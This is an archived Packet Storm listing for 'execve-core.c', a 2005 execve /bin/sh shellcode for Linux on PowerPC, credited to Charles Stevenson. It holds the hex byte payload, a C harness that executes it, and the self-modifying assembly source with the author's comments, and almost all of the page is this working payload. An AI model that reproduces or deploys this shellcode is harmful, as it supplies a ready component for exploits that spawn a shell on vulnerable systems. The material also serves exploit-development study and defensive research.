Twenty Year Anniversary

execve-core.c

execve-core.c
Posted Nov 8, 2005
Authored by Charles Stevenson | Site bokeoa.com

execve /bin/sh shellcode for Linux PPC. execve-core.s is appended.

tags | shellcode, ppc
systems | linux
MD5 | b2c9cbc7bceadb4103caa67834b2d856

execve-core.c

Change Mirror Download
/* execve-core.c by Charles Stevenson <core@bokeoa.com> */
char hellcode[] = /* execve /bin/sh linux/ppc by core */
// Sometimes you can comment out the next line if space is needed
"\x7c\x3f\x0b\x78" /*mr r31,r1*/
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL

int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte execve /bin/sh shellcode for linux/ppc by core\n",
strlen(hellcode));
shell();
return 0;
}

#;;; PowerPC Linux Execve /bin/sh Shellcode
#;;;
#;;; by Charles 'core' Stevenson <core@bokeoa.com>
#;;;
#;;; Greetz: lamagra, palante, ghandi, d0tslash, and LSD for their
#;;; significant research without which none of this would be possible.
#;;;
#;;; Fsck: drow for never sharing his shellcode. Security through
#;;; obscurity never lasts forever man what did you expect? :)
#;;;
#;;; Note: Since this code is self modifying it'll crash if you just
#;;; compile the .s and run it directly. ;-) Copy somewhere writable
#;;; or run within gdb
#;;;
#;;; Last Updated: Wed Feb 16 20:14:43 MST 2005

.globl main
main:
#;; Save the stack pointer!!!!!!!!!!!!!!!!!!!!!!!!
#;; This critical step cost me HOURS upon hours in gdb stepping
#;; through one instruction at a time! :/ Somtimes you can omit
#;mr %r31, %r1

#;;; execve("/bin/sh",["/bin/sh",NULL],NULL);
#;; GPR5 = 0 and CR = 0
#;; NOTE: xor != xor. (dot means update CR)
#;; *** THANKS GHANDI!!! ***
xor. %r5, %r5, %r5

#;; branch if counter is zero and store the address in
#;; link register (counter is 0 since we just loaded it;)
bdzl main

#;; move the address of main to GPR24
mflr %r24

#;; get offset to /bin/sh
addi %r24, %r24, 268 + 40

#;; add null to end of string
stb %r5, -261(%r24)

#;; store pointer to /bin/sh
subi %r3, %r24, 268
stw %r3, -8(%r1)

#;; r4 = argument pointer
subi %r4, %r1, 8

#;; push environment pointer
stw %r5, -4(%r1)

#;; syscall(__NR_execve)
li %r30, 11*32
srawi %r0, %r30, 5
.long 0x44deadf2 #;sc

#;; /xxx/xxZ do not remove the Z!
.ascii "/bin/shZ"

#;;; EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    17 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close